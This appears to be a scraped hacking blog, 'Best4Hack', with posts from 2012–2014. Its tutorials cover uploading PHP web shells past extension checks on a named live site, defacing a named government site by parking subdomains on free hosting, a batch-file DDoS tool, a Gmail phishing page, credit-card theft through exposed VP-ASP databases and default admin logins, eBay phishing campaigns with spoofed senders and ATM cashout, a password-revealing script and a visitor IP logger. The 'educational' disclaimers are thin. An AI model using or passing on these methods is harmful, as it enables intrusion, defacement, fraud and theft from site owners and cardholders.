Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Showing posts with label Website Hacking. Show all posts
Showing posts with label Website Hacking. Show all posts

Monday, 17 March 2014

24 Hours Direct Online Tutorial by Admin ( Prince ) on 22 March 2014


The admin is here for u ! 24 hours online tutorial ! The admin that is me , Prince , will be online via facebook , twitter , gmail and link given below for 24 hours. U can contact him personally via those links to get instant reply for those tutorial stated .

Date : 22/3/2014
Time : 00.00 - 00.00 (the next day)

The tutorial consists :
- All OS tips and tweaks (windows/Mac/Linux)
- C++ Programming language
- Beginner Hacking tips
- Software/Games Free download request
Not Included ANY Social Networks Hacking .

U can contact the Admin via :

Facebook Group : https://www.facebook.com/groups/princeTech/
Follow me on twitter : https://twitter.com/mahen_prince
Gmail Address : princemahen@gmail.com
Chatango : http://prince4hack.chatango.com/


Please DON'T make fun out of this . I m doing this for those who need help . Thanks .
This Post will be deleted on the next day . Thanks .

Friday, 8 March 2013

How to upload PHP shell through Firefox Add-on

Many times you get login of a website, but you are unable to upload your PHP shell !
Today i'll show you how to upload your PHP shell through Tamper Data an Firefox Add-on

Install Tamper Data firefox add-on:
Download Tamper Data CLICK HERE
Now Install it and Restart Firefox

Rename shell:
Note: You have to rename you .php shell to .jpg to bypass the website's security
To upload a shell, of-course you needed a upload option in login page or anywhere !

Demo:
As an example i'll take - http://freead1.net/post-free-ad-to-USA-42

It is a free classified ads posting website, so i got a upload option there !
Find your upload option click on browse, locate you .jpg shell and select it !



Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data plugin will open in a new window !


Before Clicking on Upload button click on "Start Tamper" in Tamper Data window..
Note: Before Clicking on "Start Tamper" close every extra tab you have opened.. If you want this tutorial to be open... Just open it in another browser

Now click on upload button !

After clicking on upload button "Tamper with request?" window will appear !
Click on "Tamper" button


After a click on "Tamper" you will see "Tamper Popup"
In Tamper Popup Window, Copy "POST_DATA" text in Notepad


After Copying it to Notepad... "Find yourshell.jpg" and rename it to .php.

Now copy Notepad's text back to "POST_DATA" field..and click OK
It will Upload the shell as .php and you can execute it easily !
Find your .php shell & do whatever you wanted with that website
that's all !

Saturday, 16 February 2013

How to upload Shell by Live HTTP Headers

Today I will tell you how to upload shell through Live HTTP Headers.

Requirements:-

  • Mozilla Firox
  • Live HTTP Headers Add On for Firefox 
  • A shell
So now lets begin,

  1. Login to that site as a admin, then find a place to upload a file in that particular site.
  2. Then rename your shell name to shell.php.jpg (or what ever that site supports. In my case, site supports only jpg file. Thats why i renamed it to shell.php.jpg.)
  3. Then start your Live HTTP Headers addon, after that upload your shell.
  4. Then your Live HTTP Headers will look something similar to this

  5. Then click on the shell.php.jpg, after click on Reply button.
  6. Then again a new window will open, in that window there will be two boxes, but we have to work on second box :D.
  7. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button.

Now you have successfully done, only thing you have to do is to find the shell path.

This is only for Educational purpose. Ill not responsible for any Illegal work done by you.

Hack Thousands Of Website In 000webhost With DNS Hijacking

So let me Introduce the DNS Hijacking trick making millions of Websites hosted on 000webhost and other free hosting webhosting companies vulnerable.


Step 1 : Login with a free account on 000webhost.com
it will give you a address like abcd.something.com
mine was --> http://testingfu.comule.com




now go to cpanel
now open bing.com and search for like
" ip:31.170.163.140 .gov "or ” ip:31.170.163.140 .edu

all server ips
Server 1 with 253 ips
31.170.161.1 - 31.170.161.253

Server 2 with with 253 ips
31.170.162.1 - 31.170.162.253

Server 3 with 242 ips
31.170.163.1 - 31.170.163.241

now the target i got is csirt.gov.bd

i just open this url :
abcd.csirt.gov.bd


a error page of 000webhost strikes



which shows that the dns is configured so that the site is forwarded to Nameserver of 000webhost

now what i did is enter in my cpanel which i created at 000webhost and park a subdomain :
men.csirt.gov.bd
bd.csirt.gov.bd

and done added a index page to my public_html and the website defaced .

Saturday, 15 December 2012

Create Own DDOS Tools Using Notepad (Prince)




Here I just wanted to share knowledge with you how to make
application DDOS (Distributed Denial of Service) with the help of a batch file ..
Something we need to do as followng..

1.Open Notepad

2.Copy this script into notepad

DOWNLOAD script from here . 

3.Save as batchfile.Example : DDOS.bat


How to Use

On-Target Server input menu
web address / Ip your friend that you want to DDOS
for example like this:


Right 2 click to open that batch file..

Get in victim site

Get victim ip

And then input the results of the ping IP in the host and
Packet Size for it to send the number of bytes to be
Size (size up to you)

then press "ENTER"

If u face any problem on that , pls do let me know by comment or via Facebook .


Thursday, 6 December 2012

SQLite Expert Professional v3.4.41 Portable | Full version | 42.8 Mb


SQLite Expert Professional v3.4.41 Portable | Full version | 42.8 Mb




SQLite Expert: A powerful administration tool for your SQLite databases
Are you developing SQLite3 databases and need an easy and powerful tool? SQLite Expert is the perfect choice. It is the most feature rich administration and development tool for SQLite. SQLite Expert is designed to answer the needs of all users, from writing simple SQL queries to developing complex databases.
The graphical interface supports all SQLite features. It includes a visual query builder, an SQL editor with syntax highlighting and code completion, visual table and view designers and powerful import and export capabilities.
Supported platforms: Windows 2000, XP, Vista, 7.
November 25, 2012: Version 3.4.41. build 2263
Fixed encoding issue when importing data from text files.



Friday, 30 November 2012

How To Make Phishing Site ? Easy Tutorial




PrinceMahen here. Today i am going to show you a quick tutorial on how to make a Gmail phishing ( Fake Login Page ) site.Phishing is a fake login page of a particular site which captures email and password of the victim when he type it in the form. After capturing it would send all the information to hacker's webhosting.

1) Goto free webhosting, if you have paid then you have to use that. I would recommend http://www.000webhost.com/order.php



2) Signup for free! after that goto your email for confirmation and sign in.


3) When you are logged in, Go to Cpanel, after that go to File manager for the creation of phishing page.



4) The menu will display now go to Public_html.




5) Now click upload, and upload the files to the hosting.




6) That's it, you are done! Now goto your domain and you will see it would same like gmail login page. Send the link to your friends and Enjoy hacking.
To see the input information of your phishing page ( I mean your victim's email and password ).
Go to :- http://www.yoursitesadress.p4o.net/lol.html

Download the phishing page From Here



Note - This file and its contents are only for educational purposes. Please do not misuse them.The author is not responsible in any way for your act.By using this you accept with the disclaimer.

Thursday, 29 November 2012

Largest Collection Of Google Dorks Ever Complied By PrinceMahen






Hi , I m PrinceMahen gonna share a large compilation Of Google Dorks ever made by website defacers..
Kindly download below .txt file through mediafire link given .. Thank you..





Saturday, 24 November 2012

HOW TO HACK A CREDIT CARD !!!!!!!




HELLO WORLD IM DAVIDREX IS HERE FOR A NICE AND USEFUL TRICKS:
LETS START.......


THIS TUTORIAL IS DIVIDED IN TWO PARTS.
INTRODUCTION INTO CREDIT CARDS
CREDIT CARD HACKING

NOTE: HACKING CREDIT CARDS IS AN ILLEGAL ACT, THIS IS ONLY INFORMATIONAL POST AND WE NOT RESPONSIBLE FOR ANY ACTIONS DONE BY YOU AFTER READING THIS TUTORIAL. THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.

LETS START WITH SOME EASY TERMS.

WHAT IS CREDIT CARD ?

CREDIT CARDS ARE OF TWO TYPES:
DEBIT CARD
CREDIT CARD
1. DEBIT MEANS U HAVE A SUM OF AMOUNT IN IT AND U CAN USE THEM.
2. CREDIT MEANS U HAVE A CREDIT LINE LIMIT LIKE OF $10000 AND U CAN USE THEM AND BY THE END OF MONTH PAY IT TO BANK.

TO USE A CREDIT CARD ON INTERNET U JUST NOT NEED CC NUMBER AND EXPIRY BUT U NEED MANY INFO LIKE :
FIRST NAME
LAST NAME
ADDRESS
CITY
STATE
ZIP
COUNTRY
PHONE
CC NUMBER
EXPIRY
CVV2 ( THIS IS 3DIGIT SECURITY CODE ON BACKSIDE AFTER SIGNATURE PANEL )
IF YOU GET THAT INFO YOU CAN USE THAT TO BUY ANY THING ON INTERNET, LIKE SOFTWARE LICENSE, PORN SITE MEMBERSHIP, PROXY MEMBERSHIP, OR ANY THING (ONLINE SERVICES USUALLY, LIKE WEBHOSTING, DOMAINS).

IF U WANT TO MAKE MONEY $ THROUGH HACKING THEN YOU NEED TO BE VERY LUCKY... YOU NEED TO HAVE A EXACT BANK AND BIN TO CASH THAT CREDIT CARD THROUGH ATM MACHINES.

LET ME EXPLAIN HOW ?

FIRST STUDY SOME SIMPLE TERMS.

BINS = FIRST 6 DIGIT OF EVERY CREDIT CARD IS CALLED " BIN " (FOR EXAMPLE CC NUMBER IS : 4121638430101157 THEN ITS BIN IS " 412163 "), I HOPE THIS IS EASY TO UNDERSTAND.

NOW THE QUESTION IS HOW TO MAKE MONEY THROUGH CREDIT CARDS. ITS STRANGE..., WELL YOU CANT DO THAT, BUT THERE IS SPECIFIC PERSONS IN WORLD WHO CAN DO THAT. THEY CALL THEM SELVES " CASHIERS ". YOU CAN TAKE SOME TIME TO FIND A RELIABLE CASHIERS.

NOW THE QUESTION IS EVERY BANK CREDIT CARDS ARE CASHABLE AND EVERY BIN IS CASHABLE? LIKE CITIBANK, BANK OF AMERICA , MBNA .. ARE ALL BANKS ARE CASHABLES ? WELL ANSWER IS " NO ". IF U KNOW SOME THING, A LITTLE THING ABOUT BANKING SYSTEM, HAVE U EVER HEARD WHAT IS ATM MACHINES? WHERE U WITHDRAW UR CASH BY PUTTING UR CARD IN.
EVERY BANK DON'T HAVE ATM, EVERY BANK DON'T SUPPORT ATM MACHINES CASHOUT. ONLY FEW BANKS SUPPORT WITH THEIR FEW BINS (AS U KNOW BIN IS FIRST 6 DIGIT OF ANY CREDIT / DEBIT CARD NUMBER), FOR SUPPOSE BANK OF AMERICA. THAT BANK NOT HAVE ONLY 1 BIN, THAT BANK IS ASSIGNED LIKE, 412345 412370 ARE UR BINS U CAN MAKE CREDIT CARDS ON THEM. SO BANK DIVIDE THE COUNTRY CITI LOCATION WISE, LIKE FROM 412345 - 412360 IS FOR AMERICANS, AFTER THAT FOR OUTSIDERS AND LIKE THIS. I HOPE U UNDERSTAND. SO ALL BINS OF THE SAME BANK ARE EVEN NOT CASHABLE, LIKE FOR SUPPOSE THEY SUPPORT ATM IN NEW YORK AND NOT IN CALIFORNIA, SO LIKE THE BINS OF CALIFORNIA OF SAME BANK WILL BE UNCASHABLE. SO ALWAYS MAKE SURE THAT THE BINS AND BANKS ARE 100% CASHABLE IN MARKET BY MANY CASHIERS.

BE SURE CASHIERS ARE LEGIT, BECAUSE MANY CASHIERS R THERE WHICH TAKE YOUR CREDIT CARD AND RIP U OFF AND DON'T SEND YOUR 50% SHARE BACK.
YOU CAN ALSO FIND SOME CASHIERS ON MIRC *( /SERVER IRC.UNIXIRC.NET:6667 ) CHANNEL : #CASHOUT, #CCPOWER

WELL, CHECK THE WEBSITE WHERE U HAVE LIST OF BINS AND BANKS MOSTLY 101% CASHABLE. IF U GET THE CREDIT CARD OF THE SAME BANK WITH SAME BIN, THEN U CAN CASHOUT OTHERWISE NOT . REMEMBER FOR USING CREDIT CARD ON INTERNET U DON'T NEED PIN ( 4 WORDS PASSWORD WHICH U ENTER IN ATM MACHINE ), BUT FOR CASHOUT U NEED. YOU CAN GET PINS ONLY BY 2ND METHOD OF HACKING WHICH I STILL NOT POST BUT I WILL. FIRST METHOD OF SQL INJECTION AND SHOPADMIN HACKING DON'T PROVIDE WITH PINS, IT ONLY GIVE CC NUMB CVV2 AND OTHER INFO WHICH USUALLY NEED FOR SHOPPING NOT FOR CASHING.

CREDIT CARD HACKING

CC (CREDIT CARDS) CAN BE HACKED BY TWO WAYS:
CREDIT CARD SCAMS ( USUALLY USED FOR EARNING MONEY , SOME TIMES FOR SHOPPING )
CREDIT CARD SHOPADMIN HACKING ( JUST FOR FUN, KNOWLEDGE, SHOPPING ON INTERNET )
1. SHOPADMIN HACKING

THIS METHOD IS USED FOR TESTING THE KNOWLEDGE OR FOR GETTING THE CREDIT CARD FOR SHOPPING ON INTERNET, OR FOR FUN, OR ANY WAY BUT NOT FOR CASHING ( BECAUSE THIS METHOD DON'T GIVE PIN - 4 DIGIT PASSCODE ) ONLY GIVES CC NUMB , CVV2 AND OTHER BASIC INFO.

SHOPADMINS ARE OF DIFFERENT COMPANIES, LIKE: VP-ASP , X CART, ETC. THIS TUTORIAL IS FOR HACKING VP-ASP SHOP.

I HOPE U SEEN WHENEVER U TRY TO BUY SOME THING ON INTERNET WITH CC, THEY SHOW U A WELL PROGRAMMED FORM, VERY SECURE. THEY ARE CARTS, LIKE VP-ASP XCARTS. SPECIFIC SITES ARE NOT HACKED, BUT CARTS ARE HACKED.

BELOW I'M POSTING TUTORIAL TO HACK VP ASP CART. NOW EVERY SITE WHICH USE THAT CART CAN BE HACKED, AND THROUGH THEIR *MDB FILE U CAN GET THEIR CLIENTS 'CREDIT CARD DETAILS', AND ALSO LOGIN NAME AND PASSWORD OF THEIR ADMIN AREA, AND ALL OTHER INFO OF CLIENTS AND COMAPNY SECRETS.

LETS START:

TYPE: VP-ASP SHOPPING CART
VERSION: 5.00

HOW TO FIND VP-ASP 5.00 SITES?

FINDING VP-ASP 5.00 SITES IS SO SIMPLE...

1. GO TO GOOGLE.COM AND TYPE: VP-ASP SHOPPING CART 5.00
2. YOU WILL FIND MANY WEBSITES WITH VP-ASP 5.00 CART SOFTWARE INSTALLED

NOW LET'S GO TO THE EXPLOIT..

THE PAGE WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPDISPLAYCATEGORIES.ASP
THE EXPLOIT IS: DIAG_DBTEST.ASP
NOW YOU NEED TO DO THIS: ****://***.VICTIM.COM/SHOP/DIAG_DBTEST.ASP

A PAGE WILL APPEAR CONTAIN THOSE:
XDATABASE
SHOPPING140
XDBLOCATION
RESX
XDATABASETYPEXEMAILXEMAIL NAMEXEMAILSUBJECTXEMAILSY STEMXEMAILTYPEXORDERNUMBE R
EXAMPLE:

THE MOST IMPORTANT THING HERE IS XDATABASE
XDATABASE: SHOPPING140

OK, NOW THE URL WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPPING140.MDB

IF YOU DIDN'T DOWNLOAD THE DATABASE, TRY THIS WHILE THERE IS DBLOCATION:
XDBLOCATION
RESX
THE URL WILL BE: ****://***.VICTIM.COM/SHOP/RESX/SHOPPING140.MDB

IF U SEE THE ERROR MESSAGE YOU HAVE TO TRY THIS :
****://***.VICTIM.COM/SHOP/SHOPPING500.MDB

DOWNLOAD THE MDB FILE AND YOU SHOULD BE ABLE TO OPEN IT WITH ANY MDB FILE VIEWER, YOU SHOULD BE ABLE TO FIND ONE AT DOWNLOAD.COM, OR USE MS OFFICE ACCESS.
INSIDE YOU SHOULD BE ABLE TO FIND CREDIT CARD INFORMATION, AND YOU SHOULD EVEN BE ABLE TO FIND THE ADMIN USERNAME AND PASSWORD FOR THE WEBSITE.

THE ADMIN LOGIN PAGE IS USUALLY LOCATED HERE: ****://***.VICTIM.COM/SHOP/SHOPADMIN.ASP

IF YOU CANNOT FIND THE ADMIN USERNAME AND PASSWORD IN THE MDB FILE OR YOU CAN BUT IT IS INCORRECT, OR YOU CANNOT FIND THE MDB FILE AT ALL, THEN TRY TO FIND THE ADMIN LOGIN PAGE AND ENTER THE DEFAULT PASSWORDS WHICH ARE:
USERNAME: ADMIN
PASSWORD: ADMIN
OR
USERNAME: VPASP
PASSWORD: VPASP


2. HACKING THROUGH SCAMS

THIS METHOD IS USUALLY USED TO HACK FOR EARNING MONEY. WHAT HAPPENS IN THIS METHOD IS YOU CREATE A CLONE PAGE.

TARGET: ITS BASICALLY EBAY.COM OR PAYPAL.COM FOR GENERAL CREDIT CARDS, OR IF U WANT TO TARGET ANY SPECIFIC CASHABLE BANK LIKE REGIONBANK.COM THEN U HAVE TO CREATE A CLONE PAGE FOR THAT BANK.

WHAT IS EBAY.COM?

ITS A SHOPPING SITE WORLD WIDE WHICH IS USED BY MANY OF BILLION PEOPLE WHICH USE THEIR CREDIT CARDS ON EBAY. WHAT YOU DO MAKE A SIMILAR PAGE SAME AS EBAY AND UPLOAD IT ON SOME HOSTING WHICH DON'T HAVE ANY LAW RESTRICTIONS, TRY TO FIND HOSTING IN EUROPE THEY WILL MAKE YOUR SCAM UP FOR LONG TIME, AND EMAIL THE USERS OF EBAY.

HOW TO GET THE EMAILS OF THEIR USERS?

GO TO GOOGLE.COM AND TYPE "EMAIL HARVESTOR" OR ANY EMAIL SPIDER AND SEARCH FOR EBAY BUYERS AND EBAY SELLERS AND U WILL GET LONG LIST. THAT LIST IS NOT ACCURATE BUT OUT OF 1000 ATLEAST 1 EMAIL WOULD BE VALID. ATLEAST YOU WILL GET SOME TIME.

WELL U CREATE A CLONE PAGE OF EBAY, AND MAIL THE LIST U CREATE FROM SPIDER WITH MESSAGE, LIKE "YOUR ACCOUNT HAS BEEN HACKED" OR ANY REASON THAT LOOKS PROFESSIONAL, AND ASK THEM TO VISIT THE LINK BELOW AND ENTER YOUR INFO BILLING, AND THE SCAM PAGE HAVE PROGRAMMING WHEN THEY ENTER THEIR INFO IT COMES DIRECTLY TO YOUR EMAIL.
IN THE FORM PAGE U HAVE PIN REQUIRED SO U ALSO GET THE PIN NUMBER THROUGH WHICH U CAN CASH THROUGH ATM ..

NOW IF U RUN EBAY SCAM OR PAYPAL SCAM, ITS UP TO YOUR LUCK WHO'S YOUR VICTIM. A CLIENT OF BANK OF AMERICA OR OF CITIBANK OR OF REGION, ITS ABOUT LUCK, MAYBE U GET CASHABLE, MAY BE U DON'T ITS JUST LUCK, NOTHING ELSE.

SEARCH ON GOOGLE TO DOWNLOAD A SCAM SITE AND STUDY IT !

AFTER YOU CREATE YOUR SCAM SITE, JUST FIND SOME EMAIL HARVESTOR OR SPIDER FROM INTERNET (DOWNLOAD GOOD ONE AT BULK EMAIL SOFTWARE SUPERSTORE - EMAIL MARKETING INTERNET ADVERTISING) AND CREATE A GOOD EMAIL LIST.

AND YOU NEED TO FIND A MAILER (MASS SENDING MAILER) WHICH SEND MASS - EMAILS TO ALL EMAILS WITH THE MESSAGE OF UPDATING THEIR ACCOUNT ON UR SCAM PAGE ). IN FROM TO, USE EMAIL EBAY@REPLY3.EBAY.COM AND IN SUBJECT USE : EBAY - UPDATE YOUR EBAY ACCOUNT AND IN NAME USE EBAY

SOME INSTRUCTIONS:

1. MAKE SURE YOUR HOSTING REMAINS UP OR THE LINK IN THE EMAIL U WILL SEND, AND WHEN YOUR VICTIM EMAILS VISIT IT, IT WILL SHOW PAGE CANNOT BE DISPLAYED, AND YOUR PLAN WILL BE FAILED.
2. HARDEST POINT IS TO FIND HOSTING WHICH REMAINS UP IN SCAM. EVEN I DON'T FIND IT EASILY, ITS VERY VERY HARD PART.
3. MAYBE U HAVE CONTACTS WITH SOMEONE WHO OWN HOSTING COMPANY AND CO LOCATIONS OR DEDICATED HE CAN HIDE YOUR SCAM IN SOME OF DEDICATED WITHOUT RESTRICTIONS.
4. FINDING A GOOD EMAIL LIST (GOOD MEANS = ACTUALLY USERS)
5. YOUR MASS MAILING SOFTWARE LAND THE EMAILS IN INBOX OF USERS.

Friday, 23 November 2012

CROSS SITE SCRIPTING



Cross site scripting attacks are now mostly referred to as XSS attacks. A lot of websites have been found with XSS vulnerabilities including yahoo, YouTube and even some other popular websites. XSS attacks are implemented when a website has XSS vulnerabilities.
It took me months to decipher what this attack is really about. Even when I was reading books on it, I felt I was seeing Latin. Anyway now I’ve understood a whole lot about XSS attacks and how they work. It is very simple and interesting and I believe you won’t just get what I will give you here in handy anywhere.
What is XSS attack?
This attack is also known as code injection and from that we can infer that XSS attack is the exploitation of web servers by inserting codes into the web pages. It was formerly called CSS as an acronym for cross site scripting but I think because of the existence of CSS as cascading style sheet, it was changed to XSS where the “X” represents a cross. Most times, people use the search pane to do this. In an XSS vulnerable website, when a code like <script>alert(‘you are vulnerable to XSS’);</script> is inserted, a dialog box appears showing “you are vulnerable to XSS”. If this can be done, then you can implement all other XSS exploitations on that website.
Few years back, the prestigious yahoo website was vulnerable to this attack. Then we hackers will simply inject the java script below into the address bar:
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
This was used to find password behind asterisks of anyone who has used his/her email account on that browser in that computer.
A scenario of how it works: Jeffrey uses his PC to check his yahoo account and then logs out. Simply because Jeffrey had checked the “remember me” check button on the yahoo password authentication page, it shows his email and his password in asterisks or big black dots. Once the jscript above is inserted in the address bar, Jeffrey’s password will display to me in a dialog box. This was used for a long time before yahoo fixed this error. However, you may still find a tutorial on how to hack yahoo accounts with this strategy but here I am telling you that it is stale and it can’t work anymore.
I don’t know much about how it happened with YouTube but I know I’ve heard severally about XSS vulnerabilities found in YouTube.
There is a lot more you can do with XSS which I will explain in latter posts so I will just list some other ways you can implement a cross site scripting attack.
·         It can be used to make cookie grabbers- with cross site scripting, you can pretend to be a website and steal cookies from some internet users.
·         It can be used to deface web pages
·         It can be used for phishing
To find XSS vulnerability in a website, you can use vulnerability scanners like acunetix, jsky, and there are so many others. You can even write your own program to find these vulnerabilities.


Wednesday, 21 November 2012

GET IP ADRESS OF YOUR FRIENDS USING PHP(1000 % WORKING)


HELLO DAVIDREX BACK GOING TO TEACH YOU HOW TO GET IP ADRESS OF SOMENONE USING PHP ............ (SOOO SIMPLE)
# ONLY 3 STEPS

1) COPY THE CODE BELOW AND PASTE IT IN THE NOTEPAD(code must be the same) :


<?php
$ip = $_SERVER['REMOTE_ADDR'];
$open = fopen('logs.html' , 'a+');
$fwrite = fwrite($open , $ip.'<hr />');
$fclose = fclose($open);
header('Location: https://www.facebook.com/best4hack');
?>

2) NOW SAVE THAT AS INDEX.PHP. 

3) THEN GO TO ANY FREEE WEBHOSTING SITE AND SIGNUP.

4) GO TO FILES > FILE MANAGER 1 > AND UPLOAD THE CODE(INDEX.PHP) THAT U SAVED EARLIER....

5) NOW SEND THAT DOMAIN THAT YOU REGISTER AND UPLOAD THE CODE TO YOUR FRIEND... IF HE CLICK THAT, AUTOMATICLLY U WILL GET THE IP ADRESS IN THE LOGS HTML.

#HAVE ANY PROBLEM FEEL FREE TO COMMENT AND ASK .... GOOD BAI 
VISIT OUR BLOG DAILY....

Tuesday, 20 November 2012

The best hacking tools collection



Prince Mahen again ... Here, i have collect some best hacking tools for you. That are listed below:

Nessus
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

Snort
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Netcat
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol
TCPdump
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.

Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

DNSiff
DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Ettercap
>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.

Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.

John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix.

OpenSSH
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

TripWire
Tripwire is a tool that can be used for data and program integrity assurance.

Kismet
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.

NetFilter
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.

IP Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

pf
OpenBSD Packet Filter

fport
fport identifys all open TCP/IP and UDP ports and maps them to the owning application.

SAINT
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

OpenPGP
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

Update:  
Metasploit
Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only.

Fast-track 
Fast-Track is a python based open source security tool aimed at helping penetration testers conduct highly advanced and time consuming attacks in a more methodical and automated way. Fast-Track is now included in Backtrack version 3 onwards under the Backtrack --> Penetration category. In this talk given at Shmoocon 2009, the author of Fast-Track Dave Kennedy runs us through a primer on the tool and demonstrates 7 different scenarios in which he breaks into systems using the Fast-Track tool. These scenarios include automated SQL injection, MSSQL brute forcing, Query string pwnage, Exploit rewrite, Destroying the Client and Autopwnage. 


If you know more, share with me via comment:)

Related Posts Plugin for WordPress, Blogger...